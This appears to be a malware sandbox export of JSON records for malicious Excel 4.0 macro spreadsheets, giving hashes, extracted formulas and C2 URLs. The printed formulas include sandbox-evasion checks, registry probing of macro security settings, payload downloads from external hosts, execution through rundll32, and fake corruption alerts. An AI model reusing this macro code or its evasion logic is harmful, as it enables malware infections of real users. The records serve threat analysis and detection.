{"version":"0.2","sample":{"sample":"","kind":"file","target":"9260476fbacbdf635b3bef84fec27fdc042cd8fdb427e0a65c6688e324748b8f"},"analysis":{"reported":"2020-04-09T16:17:44Z","score":10},"files":[{"filename":"9260476fbacbdf635b3bef84fec27fdc042cd8fdb427e0a65c6688e324748b8f","filesize":170496,"md5":"77d9809faced5b6c6bc60939bfaf3182","sha1":"fc313d3152c8c503c4305d513d07cab06a01aaca","sha256":"9260476fbacbdf635b3bef84fec27fdc042cd8fdb427e0a65c6688e324748b8f","sha512":"60ce8510e5b943cfb9f4e7e75ac6dd95cc91ed267cbcf4bf25c5fcc01a6c6f26cf744daa4a19b4edb0a2afff64861c0f9f1f5550f8bb061efea8707941c4f58f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9260476fbacbdf635b3bef84fec27fdc042cd8fdb427e0a65c6688e324748b8f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"7rreZGLMft\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9287b1d0fffba13b3629f13f35ee2239ea9b070f808fb29bb9ceda84acb1ec33"},"analysis":{"reported":"2020-04-09T16:17:44Z","score":10},"files":[{"filename":"9287b1d0fffba13b3629f13f35ee2239ea9b070f808fb29bb9ceda84acb1ec33","filesize":167936,"md5":"19dcebc004b301b850d46cfce1a4fca3","sha1":"7e5fb2ef9c41a19e0866fc53c65e67c75e227e8e","sha256":"9287b1d0fffba13b3629f13f35ee2239ea9b070f808fb29bb9ceda84acb1ec33","sha512":"8a39799d584f050597afdc3e756f908268682fac0162eb6428dba8812b513266214b9f7f854dedecf0e8ae352269cbbe875c687ec1d09f23ddcbd9f81f4b2340","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9287b1d0fffba13b3629f13f35ee2239ea9b070f808fb29bb9ceda84acb1ec33.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"vZu5Zh8QKX\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9292b0a6ddfd2d82a91c1201b31029774f57500d0294682f8a4432d30d9d743c"},"analysis":{"reported":"2020-04-09T16:17:44Z","score":10},"files":[{"filename":"9292b0a6ddfd2d82a91c1201b31029774f57500d0294682f8a4432d30d9d743c","filesize":116224,"md5":"93d8c2cda0e7f21b0d65fe9abe038001","sha1":"72ee61938d3662cb038bb1061c158ec8943ffaeb","sha256":"9292b0a6ddfd2d82a91c1201b31029774f57500d0294682f8a4432d30d9d743c","sha512":"3911e452e777a612418192c2c61a5c701c267d955b28e3e21ac5c293f795bf75e3c82b9ab59a2570c78be8f2a0ee89fc759cf866fa53dd948058330233369839","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9292b0a6ddfd2d82a91c1201b31029774f57500d0294682f8a4432d30d9d743c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"uyV9yYGyty\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9297cc020589c22b97d8efbf8c118a21c408e0ba96d32caf16a2d3b20520e35b"},"analysis":{"reported":"2020-04-09T16:17:44Z","score":10},"files":[{"filename":"9297cc020589c22b97d8efbf8c118a21c408e0ba96d32caf16a2d3b20520e35b","filesize":206336,"md5":"dc64b5f878014215b4f4f590dfe64fee","sha1":"4f0e0487ca27c7c5cbfa368b6ca5259484b599c0","sha256":"9297cc020589c22b97d8efbf8c118a21c408e0ba96d32caf16a2d3b20520e35b","sha512":"7242d7dcbf8cf64b799d3c63b69427c9d17e1a1a428918b66fab31246350baf61335fe692a616d9911a03315330aadde96f5bd9b814e646ca80782dfc39e1afd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9297cc020589c22b97d8efbf8c118a21c408e0ba96d32caf16a2d3b20520e35b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"eetO2eLhor\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"92d647bd14a288ce749369361a80c1ce6b4519efa13129bbc39149fb599c251a"},"analysis":{"reported":"2020-04-09T16:17:44Z","score":10},"files":[{"filename":"92d647bd14a288ce749369361a80c1ce6b4519efa13129bbc39149fb599c251a","filesize":185344,"md5":"ec84dc2767cbaf080abf114f394685d6","sha1":"e4f81fa52ab3d0a024f64e4dbaa14d6cc969b6d2","sha256":"92d647bd14a288ce749369361a80c1ce6b4519efa13129bbc39149fb599c251a","sha512":"7effed35471fee7e2d284b40cc2fcdf345e337c93d7dfa267a5f292b48e108187d7140071568a8952360c050d4824128f228c7585463fe121e70b278ffcd6807","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"92d647bd14a288ce749369361a80c1ce6b4519efa13129bbc39149fb599c251a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"92db28d09178a32a5a306726a17c8f0734daa873d63f05cf1eb6037027e4f436"},"analysis":{"reported":"2020-04-09T16:17:44Z","score":10},"files":[{"filename":"92db28d09178a32a5a306726a17c8f0734daa873d63f05cf1eb6037027e4f436","filesize":146944,"md5":"3c705029a0efc8ac5b51cf1d5dd44955","sha1":"27c45214f583738b990906de898eee62e4baa6c1","sha256":"92db28d09178a32a5a306726a17c8f0734daa873d63f05cf1eb6037027e4f436","sha512":"74a86b665944eea88ac531c5de122ef7356aed4712576d84f2511f67de656a927ff152e5761c6aa51994e24524fcc5096b6532c5840c76c0754c2222fb693ab8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"92db28d09178a32a5a306726a17c8f0734daa873d63f05cf1eb6037027e4f436.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"PGQK86Zccg\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"92df8d70161d8b93706b89913e4d243262c1f843b48386ab44fe4ad3eafeec33"},"analysis":{"reported":"2020-04-09T16:17:44Z","score":10},"files":[{"filename":"92df8d70161d8b93706b89913e4d243262c1f843b48386ab44fe4ad3eafeec33","filesize":185344,"md5":"3751671601dbccb20128f8d414e4e11d","sha1":"8a92a469b5ca226e28beca2f7fa9aba7ae945495","sha256":"92df8d70161d8b93706b89913e4d243262c1f843b48386ab44fe4ad3eafeec33","sha512":"4a81d3acfc84a069560001697c47b131f61f2f944ae59af88118ed4a3b8f31741d2a76e6623ecc522a78e6a7f6d6eb71a44d45c547b6da3b1ce0a7ded07af42f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"92df8d70161d8b93706b89913e4d243262c1f843b48386ab44fe4ad3eafeec33.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"92e320b6388b4b6050b957a98be734e977193c2ac62e1e7d5278076503501b96"},"analysis":{"reported":"2020-04-09T16:17:44Z","score":10},"files":[{"filename":"92e320b6388b4b6050b957a98be734e977193c2ac62e1e7d5278076503501b96","filesize":185344,"md5":"52bd94724f61172e5890fb2c609157ee","sha1":"92ac930a908525a63475e50e1df6dbd6dbd13735","sha256":"92e320b6388b4b6050b957a98be734e977193c2ac62e1e7d5278076503501b96","sha512":"105d054afe3312a373fa047a20aa0882f1c4656b9d558ef99210ea142b3c3a1e7e010f5fd59812faddcd5bb3fb410dfdf1747ecf543f42cbe46bfbebc06516d1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"92e320b6388b4b6050b957a98be734e977193c2ac62e1e7d5278076503501b96.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"92e6d2f36de283e2325e112b02b0dcde8bc15332224043476d2edc58e47e20b3"},"analysis":{"reported":"2020-04-09T16:17:44Z","score":10},"files":[{"filename":"92e6d2f36de283e2325e112b02b0dcde8bc15332224043476d2edc58e47e20b3","filesize":226304,"md5":"ed2c1fe02dbf628fbf08868c3308fa3b","sha1":"17ddba4ec7c46cccf1c5ab15e64ac54f29f50f86","sha256":"92e6d2f36de283e2325e112b02b0dcde8bc15332224043476d2edc58e47e20b3","sha512":"7339d17c82c21d6d7107c2448d1db1b67a02dd99f414ee7457d80e9d774f3f631deb87a1f63f4ad99a5fc0281401153404b6214a1ddbded47e3ab4ade8772a7a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"92e6d2f36de283e2325e112b02b0dcde8bc15332224043476d2edc58e47e20b3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"eoHCKAFT5o\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"92fb11e4d4538a8ec4d4d1fa4e4dd4122525ad40ff24fce6de71f6a3defc9641"},"analysis":{"reported":"2020-04-09T16:17:44Z","score":10},"files":[{"filename":"92fb11e4d4538a8ec4d4d1fa4e4dd4122525ad40ff24fce6de71f6a3defc9641","filesize":185344,"md5":"1d82e8b99e249e622cb65d1296ba698b","sha1":"f7f9be05bc86e3e1cc7488a7abfa3f042bfa4aac","sha256":"92fb11e4d4538a8ec4d4d1fa4e4dd4122525ad40ff24fce6de71f6a3defc9641","sha512":"1ae8d7247fb17478b2095da719fa5c2c491b6d8e6cb7f32dc9c620557b0cacda56a3494a55409f82881cb7b91c4e5acaeaf6c1263f9f15fb7787fbf012790079","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"92fb11e4d4538a8ec4d4d1fa4e4dd4122525ad40ff24fce6de71f6a3defc9641.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"93056e7f7bc8b5c2899d633c5f11a02a6bbc8e3202b7448fa4c4893bf336cd0c"},"analysis":{"reported":"2020-04-09T16:17:44Z","score":10},"files":[{"filename":"93056e7f7bc8b5c2899d633c5f11a02a6bbc8e3202b7448fa4c4893bf336cd0c","filesize":141824,"md5":"193a7346217a4d0c86a1866c1030e2d6","sha1":"af8ea1a20ea53ced782b30c8008d923dafa7ba9c","sha256":"93056e7f7bc8b5c2899d633c5f11a02a6bbc8e3202b7448fa4c4893bf336cd0c","sha512":"a4c79097cfa26eb08d61b650b3aeed3c79dc4f0c3db4bc488e3a4489d229fc437996b55fb3e76bc1ff7e31b6795dbd8b8a3713d43d755fb63b769ca4e7c5286e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"93056e7f7bc8b5c2899d633c5f11a02a6bbc8e3202b7448fa4c4893bf336cd0c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"357VUrHEix\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9311d82d3df12a0a65f3a002525d5ef0896b37d6cdd5e699c02e5a6c2dfa194d"},"analysis":{"reported":"2020-04-09T16:17:44Z","score":10},"files":[{"filename":"9311d82d3df12a0a65f3a002525d5ef0896b37d6cdd5e699c02e5a6c2dfa194d","filesize":185344,"md5":"43f1fbef630c4078747658fbc68c5bb9","sha1":"94daadac7f1842a2ee2144599cec8af170285925","sha256":"9311d82d3df12a0a65f3a002525d5ef0896b37d6cdd5e699c02e5a6c2dfa194d","sha512":"38f9e17febedacf95afa91cef6d0297a81eb78be6ca09cb033179939ed3f3ec0f98a6bf9e05dc0b4d12a4166877633a27fad9a002593510a84774113b876e94d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9311d82d3df12a0a65f3a002525d5ef0896b37d6cdd5e699c02e5a6c2dfa194d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"931369cbc88bf18886e1f3ba28ee6d7d6ad033a2af864556fd239c9173ea7ab1"},"analysis":{"reported":"2020-04-09T16:17:44Z","score":10},"files":[{"filename":"931369cbc88bf18886e1f3ba28ee6d7d6ad033a2af864556fd239c9173ea7ab1","filesize":171008,"md5":"785e1c44f29cc753b74b434fce5d88ad","sha1":"704d029bb1903d37600e89cbbb319c51ccc82e5c","sha256":"931369cbc88bf18886e1f3ba28ee6d7d6ad033a2af864556fd239c9173ea7ab1","sha512":"470d1b0d907a7e45e96a845079b1ef73da177ddd5d56565d1cd261f37c7800f4f3bca27e0b12f263515785bff04f2d74f5502e1fcc7124a26849ce9271e7d9ea","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"931369cbc88bf18886e1f3ba28ee6d7d6ad033a2af864556fd239c9173ea7ab1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"TxltfyfRIG\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9318fbffad831ea94e509a3d4496c57e0b59e3fc89ea7ff2c480042881243b3d"},"analysis":{"reported":"2020-04-09T16:17:44Z","score":10},"files":[{"filename":"9318fbffad831ea94e509a3d4496c57e0b59e3fc89ea7ff2c480042881243b3d","filesize":185344,"md5":"6c275769546dde6e9a521bf5f405d089","sha1":"cfbed3cff596526b3d1384a9ff8dfbc64c39624f","sha256":"9318fbffad831ea94e509a3d4496c57e0b59e3fc89ea7ff2c480042881243b3d","sha512":"84aa4007f6d797daa023616bf95a1fdee44a6c3b982aa779cdedf6b83903f9fb072ff870247dd8145c304fa78202a85986f47fe67f04875bb074d28b5c768f96","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9318fbffad831ea94e509a3d4496c57e0b59e3fc89ea7ff2c480042881243b3d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"93395133faa01dd0882f2ee9a6e37b2b728e33c66553d7a087913a2c2158493c"},"analysis":{"reported":"2020-04-09T16:17:44Z","score":10},"files":[{"filename":"93395133faa01dd0882f2ee9a6e37b2b728e33c66553d7a087913a2c2158493c","filesize":185344,"md5":"c2f4e60c7b7456a4aeaea01f1a89a91d","sha1":"d8c24e036e34f6791b41c92768741bad66e28e7d","sha256":"93395133faa01dd0882f2ee9a6e37b2b728e33c66553d7a087913a2c2158493c","sha512":"2204abc1cc6a9254afc025df68cfe78856a48a44ee0eb48aa909e56dd10d3a9db18c66e6999585ab6ddbf4c169512c06b1c8b0fe6417aa3629789bc528dcd35f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"93395133faa01dd0882f2ee9a6e37b2b728e33c66553d7a087913a2c2158493c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9339f8aa2e94999568cd35f9f0c3b7f3e16d474e6f75833552b92e9e5d9a8b7e"},"analysis":{"reported":"2020-04-09T16:17:44Z","score":10},"files":[{"filename":"9339f8aa2e94999568cd35f9f0c3b7f3e16d474e6f75833552b92e9e5d9a8b7e","filesize":147968,"md5":"9cd1e8c51b17c66ab1f38cdf0d1f4642","sha1":"e391d2a38d5281ac3b1c39ffd0f4531112c362a3","sha256":"9339f8aa2e94999568cd35f9f0c3b7f3e16d474e6f75833552b92e9e5d9a8b7e","sha512":"54914fe7e4e90f2e5ec7322f50e15eb8955c0bb0c7893e86a3593dcf846b81ecb590b1dd3d8f2f17c568f7aed05bdec15751970aef2fe2ab07d0a164e6e6efae","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9339f8aa2e94999568cd35f9f0c3b7f3e16d474e6f75833552b92e9e5d9a8b7e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"KWgd4Arvte\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9343bab7c9d4a46b6178ecf63b6d5df8680122c37f35e3bd7ef0ab9429a97173"},"analysis":{"reported":"2020-04-09T16:17:44Z","score":10},"files":[{"filename":"9343bab7c9d4a46b6178ecf63b6d5df8680122c37f35e3bd7ef0ab9429a97173","filesize":185344,"md5":"bc929fd869503fad65232bbe91a4cdca","sha1":"9ab6207b40006e5123405544ac4d64b6daab65e5","sha256":"9343bab7c9d4a46b6178ecf63b6d5df8680122c37f35e3bd7ef0ab9429a97173","sha512":"b0c27847ce55ce7affc5dc586e27639993facbe02b7e472fd872776f757279ecf631fdad17c4f901e09338ff51d19f3103a91fe3c2c7ac8af1e65df4d79ffa0b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9343bab7c9d4a46b6178ecf63b6d5df8680122c37f35e3bd7ef0ab9429a97173.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
